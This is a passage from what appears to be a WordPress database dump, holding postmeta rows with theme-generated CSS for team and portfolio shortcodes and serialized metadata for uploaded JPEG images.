justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(21600,3349,'_wp_attached_file','2022/11/w22m2.jpg'),
(21601,3349,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:353;s:6:\"height\";i:279;s:4:\"file\";s:17:\"2022/11/w22m2.jpg\";s:8:\"filesize\";i:91014;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"w22m2-300x237.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:237;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15172;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"w22m2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7149;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(21602,3334,'the7_shortcodes_dynamic_css','a:2:{s:32:\"8751f10aebe0bde516dde7a5d06b2a53\";s:6509:\".dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53  .team-media {\n  padding: 5px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-8751f10aebe0bde516dde7a5d06b2a53.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(21603,3353,'_wp_attached_file','2022/11/main11.jpg'),
(21604,3353,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1344;s:6:\"height\";i:437;s:4:\"file\";s:18:\"2022/11/main11.jpg\";s:8:\"filesize\";i:173287;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"main11-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9674;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"main11-1024x333.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74761;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"main11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7714;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"main11-768x250.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:47691;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:18:\"main11-500x163.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:163;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23001;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:18:\"main11-800x260.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50557;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:19:\"main11-1280x416.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:416;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104809;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(21605,3165,'_wp_attachment_backup_sizes','a:9:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:1581;s:6:\"height\";i:517;s:4:\"file\";s:10:\"main22.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:18:\"main22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7850;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:17:\"main22-300x98.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9690;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:18:\"main22-768x251.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50246;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:19:\"main22-1024x335.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:335;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80604;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:19:\"main22-1536x502.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:502;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155540;}s:11:\"awb_sm-orig\";a:5:{s:4:\"file\";s:18:\"main22-500x164.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23266;}s:11:\"awb_md-orig\";a:5:{s:4:\"file\";s:18:\"main22-800x262.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:53892;}s:11:\"awb_lg-orig\";a:5:{s:4:\"file\";s:19:\"main22-1280x419.jpg\";s:5:\"width\";i:1280;s:6:\"height\";i:419;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118023;}}'),
(21606,3354,'_wp_attached_file','2022/11/main1.jpg'),
